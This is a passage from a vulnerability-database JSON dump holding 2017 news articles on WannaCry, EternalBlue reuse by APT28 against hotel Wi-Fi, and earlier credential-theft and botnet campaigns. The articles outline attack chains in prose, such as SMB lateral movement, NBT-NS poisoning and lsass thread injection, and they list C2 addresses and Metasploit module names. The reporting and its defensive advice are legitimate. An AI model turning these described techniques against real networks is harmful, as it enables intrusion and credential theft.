\n \nWhile it was still not known who was behind WannaCry when this was written, such large-scale cyber attacks are often the work of nation states; at that time, however, the attack had not been publicly linked to any government (see the update above on the later-reported North Korea link). \n\n\n> \"The recent attack is at an unprecedented level and will require a complex international investigation to identify the culprits,\" said Europol, Europe's police agency.\n\nWhy are they hijacking hundreds of thousands of computers around the globe? Simple \u2014 to extort money by blackmailing infected users. \n\n\n[![wannacry-bitcoin](https://4.bp.blogspot.com/-cFyPrIlC1x0/WRnkPC28dKI/AAAAAAAAsqg/k_DozZeVaicpcMfeG57WG0CPgLlUcnvDwCLcB/s1600/bitcoin.png)](<https://4.bp.blogspot.com/-cFyPrIlC1x0/WRnkPC28dKI/AAAAAAAAsqg/k_DozZeVaicpcMfeG57WG0CPgLlUcnvDwCLcB/s1600/bitcoin.png>)\n\nBy looking at the infection rate, it seems like the criminals responsible for this absurd attack would have made lots and lots of dollars so far, but surprisingly they have made relatively little in the way of profits, according to [@actual_ransom](<https://twitter.com/actual_ransom>), a Twitter account that\u2019s tweeting details of every single transaction. \n \nAt the time of writing, the WannaCry attackers had received 171 payments totaling 27.96968763 BTC ($47,510.71 USD). \n \n\n\n### Who is responsible for WannaCry Attack?\n\n \n\u2014 Is it Microsoft who created an operating system with so many vulnerabilities? \n \n\u2014 Or is it the NSA, the intelligence agency of the United States, who found this critical SMB vulnerability and indirectly facilitated WannaCry-like attacks by not disclosing it to Microsoft? \n \n\u2014 Or is it the Shadow Brokers, the hacking group, who obtained the NSA's tools, but instead of reporting them to Microsoft decided to dump the hacking tools and exploits in public? (By the time of the April dump Microsoft had already patched this flaw in March, as noted above; the damage came from the many systems that had not yet applied the patch.) \n \n\u2014 Or is it the Windows users themselves, who did not install the patches on their systems or are still using an unsupported version of Windows? 
\n \nI do not know who can be blamed for this attack, but according to me, all of them shares equal responsibility. \n \n\n\n### Microsoft Blames NSA/CIA for WannaCry Cyber Attack\n\n \nMicrosoft has hit out at the US government for facilitating cyber attacks, like WannaCry, by not disclosing the software vulnerabilities to the respective vendors and holding them for their benefits, like global cyber espionage. \n \nIn a blog post on Sunday, Microsoft President Brad Smith [condemned](<https://blogs.microsoft.com/on-the-issues/2017/05/14/need-urgent-collective-action-keep-people-safe-online-lessons-last-weeks-cyberattack/>) the US intelligence agencies\u2019 unethical practices, saying that the \"widespread damage\" caused by WannaCry happened due to the NSA, CIA and other intelligence agencies for holding zero-days and allowing them to be stolen by hackers. \n\n\n> \"This is an emerging pattern in 2017. We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world,\" Smith said.\n\nThis statement also publicly confirms that the hacking tools and exploits leaked by the Shadow Brokers belong to Equation Group, an elite group of hackers from NSA. \n\n\n> \"Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage,\" Smith wrote.\n\n \n\n\n### You Should Thank These Experts\n\n \nWhen the outbreak of WannaCry ransomware started on Friday night, It had already infected at least 30,000 computers worldwide, and at that moment nobody had an idea what\u2019s happening and how the ransomware can spread itself like a worm so quickly. \n \nSince then, in last three days, some cybersecurity experts and companies are continuously working hard, day and night, to analyze malware samples to find every possible way to stop this massive attack. 
\n \n\n\n[Thanks for Your Hard Work \ud83d\ude0d @MalwareTechBlog @msuiche @craiu @gentilkiwi @x0rz to Kill the WannaCry.](<https://www.blogger.com/Thanks+for+Your+Hard+Work+%F0%9F%98%8D+%40MalwareTechBlog+%40msuiche+%40craiu+%40gentilkiwi+%40x0rz+to+Kill+%23WannaCry+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>) \n\n\n[CLICK TO TWEET__](<https://twitter.com/intent/tweet?text=Thanks+for+Your+Hard+Work+%F0%9F%98%8D+%40MalwareTechBlog+%40msuiche+%40craiu+%40gentilkiwi+%40x0rz+to+Kill+%23WannaCry+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>)\n\n \nI have mentioned some of them, who should be thanked for saving millions of computers from getting hacked: \n\n\n * [MalwareTech](<https://twitter.com/MalwareTechBlog/>) \u2014 very skilled 22-years-old malware hunter who first discovered that here\u2019s a kill-switch, which if used could stop ongoing ransomware attack.\n * [Matthieu Suiche](<https://twitter.com/msuiche>) \u2014 security researcher who discovered the second kill-switch domain in a WannaCry variant and prevent nearly 10,000 computers from getting hacked.\n * [Costin Raiu](<https://twitter.com/craiu/>) \u2014 security researcher from Kaspersky Lab, who first found out that there are more WannaCry variants in the wild, created by different hacking groups, with no kill-switch ability.\nNot only this, [Benjamin Delpy](<https://twitter.com/gentilkiwi/>), [Mohamed Saher](<https://twitter.com/halsten/>), [x0rz](<https://twitter.com/x0rz>), [Malwarebytes](<https://twitter.com/MalwareBytes/>), [MalwareUnicorn](<https://twitter.com/MalwareUnicorn>), and many others. This list of experts is very long, and if I have missed some name, then I'm sorry. 
\n \nYou can also follow our channel [@TheHackerNews](<https://twitter.com/thehackersnews>), me [@Unix_Root](<https://twitter.com/unix_root>), and our Cybersecurity reporter [@Swati_THN](<https://twitter.com/swati_thn>), on twitter for latest updates. \n \nThank you. Stay tuned.\n", "published": "2017-05-15T05:11:00", "modified": "2017-05-16T08:27:07", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2017-0148"], "lastseen": "2018-01-27T10:06:40", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 9.3, "modified": "2018-01-27T10:06:40"}}, "objectVersion": "1.4"}, "differentElements": ["description", "modified"], "edition": 1}], "viewCount": 17, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2018-03-15T23:37:17", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", 
"EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2018-03-15T23:37:17", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THN:F12E2167FDA829ED32C7A16A83B048BF", "type": "thn", "bulletinFamily": "info", "title": "Cyberspies Are Using Leaked NSA Hacking Tools to Spy On Hotels Guests", "description": "[![Cyberspies Are Using Leaked NSA Hacking Tools to Spy On Hotels Guests](https://4.bp.blogspot.com/-tF29uDwnYZc/WZLNQ7mBHvI/AAAAAAAAuFE/RrauEykBDSMqEn8cYCgp9afp2tpT4QIpACLcBGAs/s1600/hotel-wifi-hacking.png)](<https://4.bp.blogspot.com/-tF29uDwnYZc/WZLNQ7mBHvI/AAAAAAAAuFE/RrauEykBDSMqEn8cYCgp9afp2tpT4QIpACLcBGAs/s1600/hotel-wifi-hacking.png>)\n\nAn infamous Russian-linked cyber-espionage group has been found re-using the same leaked NSA hacking tool that was deployed in the [WannaCry](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) and NotPetya outbreaks\u2014this time 
to target Wi-Fi networks to spy on hotel guests in several European countries. \n \nSecurity researchers at FireEye have [uncovered](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) an ongoing campaign that remotely steals credentials from high-value guests using Wi-Fi networks at European hotels, and attributed it to the [Fancy Bear](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>) hacking group. \n \n**Fancy Bear**\u2014also known as APT28, Sofacy, Sednit, and Pawn Storm\u2014has been operating since at least 2007 and has also been accused of [hacking the Democratic National Committee](<https://thehackernews.com/2016/07/hillary-clinton-hacked.html>) (DNC) and the Clinton campaign in an attempt to influence the U.S. presidential election. \n \nThe newly-discovered campaign is also using the Windows SMB exploit called **[EternalBlue](<https://thehackernews.com/2017/04/swift-banking-hacking-tool.html>)**, which targets the SMBv1 flaws fixed by MS17-010 (CVE-2017-0143 through CVE-2017-0148) and was one of many exploits allegedly used by the NSA for surveillance and leaked by the Shadow Brokers in April. \n \nEternalBlue is not itself a vulnerability but an exploit for a flaw in Windows' Server Message Block (SMB) version 1 implementation; once an attacker has a foothold on one machine, it lets malware spread laterally to any other unpatched, SMBv1-enabled host it can reach on the network, which is what allowed the WannaCry and NotPetya outbreaks to spread across the world so quickly. \n \nSince the EternalBlue code is available for anyone to use, cyber criminals are widely trying to use the exploit to make their malware more powerful. \n \nJust last week, a new version of the credential-stealing [TrickBot banking Trojan](<https://thehackernews.com/2017/08/trickbot-banking-trojan.html>) was found leveraging SMB to spread locally across networks, though the trojan was not leveraging EternalBlue at that time. \n \nHowever, researchers have now found someone deploying the exploit to upgrade their attack. 
\n\n\n> \"To spread through the hospitality company's network, APT28 used a version of the EternalBlue SMB exploit,\" FireEye researchers write. \"This is the first time we have seen APT28 incorporate this exploit into their intrusions.\"\n\nResearchers have seen ongoing attacks targeting a number of companies in the hospitality sector, including hotels in at least seven countries in Europe and one Middle Eastern country. \n \n\n\n### Here's How the Attack is Carried Out\n\n \nThe attacks began with a spear-phishing email sent to one of the hotel employees. The email contains a malicious document named \"Hotel_Reservation_Form.doc,\" which uses macros to decode and deploy GameFish, malware known to be used by [Fancy Bear](<https://thehackernews.com/2017/07/russian-fancy-bear-hacking-group.html>); blocking macro execution in documents received from outside the organization stops this initial stage. \n \nOnce installed on the targeted hotel's network, **GameFish** uses the [EternalBlue SMB exploit](<https://thehackernews.com/2017/05/wannacry-ransomware-windows.html>) to spread laterally across the hotel network and find the systems that control both the guest and the internal Wi-Fi networks, which is why MS17-010 and disabling SMBv1 matter for hotel back-office machines, not only for guests' own devices. \n \nOnce in control of those systems, the malware deploys **[Responder](<https://github.com/SpiderLabs/Responder>)**, an open source penetration testing tool created by Laurent Gaffie of SpiderLabs, for NetBIOS Name Service (NBT-NS) poisoning in order to steal credentials sent over the wireless network. NBT-NS poisoning works by answering guests' broadcast name lookups so that their Windows machines authenticate to the attacker's host; what is captured is typically an NTLM challenge-response, which can be cracked offline or relayed. Disabling NetBIOS over TCP/IP and LLMNR on travelling laptops, and forcing all traffic through a VPN as soon as the Wi-Fi link is up, removes most of this exposure. \n \nWhile the hacking group carried out the attack against the hotel network, researchers believe that the group could also directly target \"hotel guests of interest\"\u2014generally business and government personnel travelling in a foreign country. \n \nThe researchers revealed one such incident that occurred in 2016 where Fancy Bear accessed the computer and Outlook Web Access (OWA) account of a guest staying at a hotel in Europe, 12 hours after the victim connected to the hotel\u2019s Wi-Fi network. \n \nThis is not the only attack that has apparently targeted hotel guests. 
South Korea-nexus Fallout Team (also known as [DarkHotel](<https://thehackernews.com/2014/11/darkhotel-apt-malware-targets-global.html>)) has previously carried out such attacks against Asian hotels to steal information from senior executives from large global companies during their business trips. \n \nDuqu 2.0 malware also found targeting the WiFi networks of European hotels used by participants in the Iranian nuclear negotiations. Also, high-profile people visiting Russia and China may have their laptops and other electronic devices accessed. \n \nThe easiest way to protect yourself is to avoid connecting to hotel Wi-Fi networks or any other public or untrusted networks, and instead, use your mobile device hotspot to get access to the Internet.\n", "published": "2017-08-11T04:55:00", "modified": "2017-08-15T10:31:27", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://thehackernews.com/2017/08/hotel-wifi-hacking-tools.html", "reporter": "Swati Khandelwal", "references": [], "cvelist": ["CVE-2017-0143"], "lastseen": "2018-01-27T09:17:57", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2018-01-27T09:17:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", 
"SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, 
{"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2018-01-27T09:17:57", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "type": "thn", "bulletinFamily": "info", "title": "More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry", "description": "[![More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry](https://4.bp.blogspot.com/-10YR4G_L7tQ/WR7pabf4idI/AAAAAAAAswk/1S7J-juAZ8I6dFDAWQti21uL7zJzachdwCLcB/s1600/blackhat-windows-smb-flaw.png)](<https://4.bp.blogspot.com/-10YR4G_L7tQ/WR7pabf4idI/AAAAAAAAswk/1S7J-juAZ8I6dFDAWQti21uL7zJzachdwCLcB/s1600/blackhat-windows-smb-flaw.png>)\n\nSince the Shadow Brokers released the zero-day software vulnerabilities and hacking tools \u2013 allegedly belonged to the NSA's elite hacking team Equation Group \u2013 several [hacking groups and individual hackers](<https://thehackernews.com/2017/04/windows-hacking-tools.html>) have started using them in their own way. \n \nThe April's data dump was believed to be the most damaging release by the Shadow Brokers till the date, as it publicly leaked lots of [Windows hacking tools](<https://thehackernews.com/2017/04/swift-banking-hacking-tool.html>), including dangerous Windows SMB exploit. 
\n \nAfter the [outbreak of WannaCry](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) last week, security researchers have identified multiple different campaigns exploiting the [Windows SMB vulnerability](<https://thehackernews.com/2017/04/window-zero-day-patch.html>) (CVE-2017-0143), called **Eternalblue**, which has already compromised hundreds of thousands of computers worldwide. \n \nIt has even been confirmed to me by multiple sources in the hacking and intelligence community that there are lots of groups and individuals who are actively exploiting Eternalblue for different motives. \n \nMoreover, the Eternalblue SMB exploit (_MS17-010_) has now been ported to [Metasploit](<https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010>), a penetration testing framework that enables researchers as well as hackers to exploit this vulnerability easily. \n \nCybersecurity startup Secdo, an [incident response platform](<https://thehackernews.com/2017/03/secdo-incident-response.html>), has recently [discovered](<http://blog.secdo.com/multiple-groups-exploiting-eternalblue-weeks-before-wannacry>) two separate hacking campaigns using the same Eternalblue SMB exploit at least three weeks before the outbreak of [WannaCry global ransomware attacks](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>). \n \nSo, it would not be surprising to find more hacking groups, state-sponsored attackers, financially motivated organized criminal gangs and gray hat hackers exploiting Eternalblue to target large organizations and individuals. 
\n\n\n[![EternalBlue-windows-smb-exploit](https://2.bp.blogspot.com/-7TYJcbsvly8/WR7jEtochxI/AAAAAAAAswI/HL5yE-ypLrc2SG5QF-XLsVPZmko6VvxWgCLcB/s1600/EternalBlue-windows-smb-exploit.png)](<https://2.bp.blogspot.com/-7TYJcbsvly8/WR7jEtochxI/AAAAAAAAswI/HL5yE-ypLrc2SG5QF-XLsVPZmko6VvxWgCLcB/s1600/EternalBlue-windows-smb-exploit.png>)\n\n \nThe two newly discovered hacking campaigns, one traced back to Russia and another to China, are much more advanced than WannaCry, as sophisticated hackers are leveraging Eternalblue to install backdoors, Botnet malware and exfiltrate user credentials. \n \nAccording to [Secdo](<http://blog.secdo.com/multiple-groups-exploiting-eternalblue-weeks-before-wannacry>), these attacks might pose a much bigger risk than WannaCry, because even if companies block WannaCry and patch the SMB Windows flaw, _\"a backdoor may persist and compromised credentials may be used to regain access\"_ to the affected systems. \n \nBoth campaigns use a similar attack flow, wherein attackers initially infect the target machine with malware via different attack vectors, then use Eternalblue to infect other devices in the same network, and finally inject a stealthy thread inside legitimate applications, which is then used to achieve persistence by either deploying a backdoor or exfiltrating login credentials. \n \n\n\n### Russian Campaign: Credential-Theft Attacks \n\n[![ETERNALBLUE-WannaCry](https://2.bp.blogspot.com/-xtLKSjbZg-o/WR7jVtvAo9I/AAAAAAAAswM/sswg78ncyiA_BdRyfF5-A--ldOarpaE-gCLcB/s1600/ETERNALBLUE-WannaCry.png)](<https://2.bp.blogspot.com/-xtLKSjbZg-o/WR7jVtvAo9I/AAAAAAAAswM/sswg78ncyiA_BdRyfF5-A--ldOarpaE-gCLcB/s1600/ETERNALBLUE-WannaCry.png>)\n\nSecdo discovered that attackers are injecting a malicious thread into the 'lsass.exe' process using Eternalblue. \n \nOnce infected, the thread begins downloading multiple malicious modules and then accesses the SQLite DLL to retrieve users' saved login credentials from Mozilla's FireFox browser. 
\n \nThe stolen credentials are then sent to the attacker's command-and-control server via the encrypted Tor network in order to hide the real location of the C&amp;C server. \n \nOnce sent, a ransomware variant of **CRY128**, which is a member of the infamous Crypton ransomware family, starts running in memory and encrypts all the documents on the affected system. \n\n\n> According to Secdo, \"at least 5 of the most popular Next Gen AV vendors and Anti-Malware vendors were running on the endpoints and were unable to detect and stop this attack. This is most likely due to the thread only nature of the attack.\"\n\nThis attack has been traced back to late April, which is three weeks prior to the WannaCry outbreak. The attack originates from a Russia-based IP address (77.72.84.11), but that doesn't mean the hackers are Russian. \n \n\n\n### Chinese Campaign: Installs Rootkit and DDoS Botnet\n\n[![smb-exploit-blackhat](https://2.bp.blogspot.com/-eqJx-ApbOg8/WR7jqhg5lFI/AAAAAAAAswQ/F0NR7uhn6oQk5o5wiqUktMR4tqnax16MACLcB/s1600/smb-exploit-blackhat.png)](<https://2.bp.blogspot.com/-eqJx-ApbOg8/WR7jqhg5lFI/AAAAAAAAswQ/F0NR7uhn6oQk5o5wiqUktMR4tqnax16MACLcB/s1600/smb-exploit-blackhat.png>)\n\nThis campaign was also seen in late April. \n \nUsing Eternalblue, a malicious thread is spawned inside of the lsass.exe process, similar to the above-mentioned credential theft attack. \n \nBut instead of remaining purely in memory, the initial payload then connects back to a Chinese command-and-control server on port 998 (117.21.191.69) and downloads a known rootkit backdoor, which is based on \u2018Agony rootkit\u2019, to achieve persistence. \n \nOnce installed, the payload installs a Chinese [Botnet malware](<https://thisissecurity.net/2015/09/30/when-elf-billgates-met-windows/>), equipped with DDoS attack functionality, on the affected machine. 
\n\n\n> \"These attacks demonstrate that many endpoints may still be compromised despite having installed the latest security patch,\" Secdo concluded. \n\n> \"We highly recommend using a solution that has the ability to record events at the thread level in order to hunt, mitigate and assess potential damage as soon as possible.\"\n\nThese malicious campaigns went unnoticed for weeks because unlike WannaCry, the purpose of these attacks was different, holding affected systems for a long time by achieving persistent and stealing credentials to regain access. \n \nThe recent example is of \"**Adylkuzz**,\" a recently-discovered stealthy[ cryptocurrency-mining malware](<https://thehackernews.com/2017/05/smb-exploit-cryptocurrency-mining.html>) that was also using Windows SMB vulnerability at least two weeks before the outbreak of WannaCry ransomware attacks. \n \nThese attacks are just the beginning, as attacks like WannaCry have not been completely stopped and given the broad impact of the NSA exploits, hackers and cyber criminals are curiously waiting for the [next Shadow Brokers release](<https://thehackernews.com/2017/05/shodow-brokers-wannacry-hacking.html>), which promised to leak more zero-days and exploits from next month. \n \nSince the attackers are currently waiting for new zero-days to exploit, there is very little users can do to protect themselves from the upcoming cyber attacks. 
\n \nYou can follow some basic security tips that I have mentioned in my previous article about how to disable SMB and prevent your devices from getting hacked.\n", "published": "2017-05-19T01:52:00", "modified": "2017-05-19T15:00:40", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://thehackernews.com/2017/05/eternalblue-smb-exploit.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2017-0143"], "lastseen": "2018-01-27T09:18:01", "history": [], "viewCount": 790, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-01-27T09:18:01", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", 
"1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": 